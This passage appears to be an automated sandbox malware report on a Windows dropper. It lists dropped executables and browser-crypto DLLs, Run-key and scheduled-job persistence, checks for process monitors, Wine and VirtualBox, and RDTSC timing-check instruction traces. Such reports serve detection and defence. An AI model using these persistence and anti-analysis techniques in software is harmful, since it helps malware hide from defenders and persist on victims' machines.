Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000023001\951fa0b99a.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4065fbc12b.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4d1c7345ec.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4065fbc12b.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4065fbc12b.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4d1c7345ec.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4d1c7345ec.exe Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C2E55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 8_2_6C2E55F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E81020 second address: E81024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8119C second address: E811AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0154ECB87Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E811AC second address: E811B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E815B0 second address: E815DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jno 00007F0154ECB876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0154ECB87Eh 0x00000011 pushad 0x00000012 jmp 00007F0154ECB87Ah 0x00000017 je 00007F0154ECB876h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84A04 second address: E84A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84A08 second address: E84A73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ECB881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e mov ecx, dword ptr [ebp+122D38E2h] 0x00000014 jmp 00007F0154ECB883h 0x00000019 popad 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F0154ECB878h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 movzx edx, dx 0x00000039 push AD75606Dh 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push eax 0x00000042 pop eax 0x00000043 push ecx 0x00000044 pop ecx 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84A73 second address: E84AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F0154ED0541h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 528AA013h 0x00000014 push 00000003h 0x00000016 jmp 00007F0154ED0547h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F0154ED0538h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 jmp 00007F0154ED0544h 0x0000003c push 00000003h 0x0000003e push 97EA6ACFh 0x00000043 pushad 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84AED second address: E84B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0154ECB880h 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007F0154ECB87Dh 0x00000010 pop ecx 0x00000011 popad 0x00000012 xor dword ptr [esp], 57EA6ACFh 0x00000019 xor ecx, 56ED0E33h 0x0000001f or si, 5B5Ch 0x00000024 lea ebx, dword ptr [ebp+12459936h] 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F0154ECB878h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov dx, 7F00h 0x00000048 xchg eax, ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushad 0x0000004d popad 0x0000004e jnc 00007F0154ECB876h 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84B58 second address: E84B63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F0154ED0536h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84B63 second address: E84B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F0154ECB87Ah 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84C74 second address: E84C87 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F0154ED0536h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84C87 second address: E84C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84C8B second address: E84CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0154ED053Ah 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jl 00007F0154ED0547h 0x00000016 jmp 00007F0154ED0541h 0x0000001b pop eax 0x0000001c push ecx 0x0000001d mov dword ptr [ebp+122D3398h], ebx 0x00000023 pop edi 0x00000024 lea ebx, dword ptr [ebp+1245993Fh] 0x0000002a call 00007F0154ED0541h 0x0000002f mov esi, dword ptr [ebp+122D3A12h] 0x00000035 pop edi 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 push edx 0x0000003a jmp 00007F0154ED053Eh 0x0000003f pop edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84CF1 second address: E84D0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0154ECB888h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84E06 second address: E84E19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0154ED053Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84E19 second address: E84EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0154ECB87Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 1B4AF9ECh 0x00000014 and ecx, 326FC392h 0x0000001a push 00000003h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F0154ECB878h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000019h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 sbb edx, 2C5BC64Fh 0x0000003c push 00000000h 0x0000003e call 00007F0154ECB87Ch 0x00000043 jmp 00007F0154ECB87Ah 0x00000048 pop esi 0x00000049 push 00000003h 0x0000004b sub dword ptr [ebp+122D1845h], ebx 0x00000051 push BF936A30h 0x00000056 jnp 00007F0154ECB885h 0x0000005c xor dword ptr [esp], 7F936A30h 0x00000063 sub dword ptr [ebp+122D24B1h], ebx 0x00000069 lea ebx, dword ptr [ebp+1245994Ah] 0x0000006f mov edi, dword ptr [ebp+122D36BEh] 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 jno 00007F0154ECB87Ch 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA3E9B second address: EA3EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA3EA5 second address: EA3EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
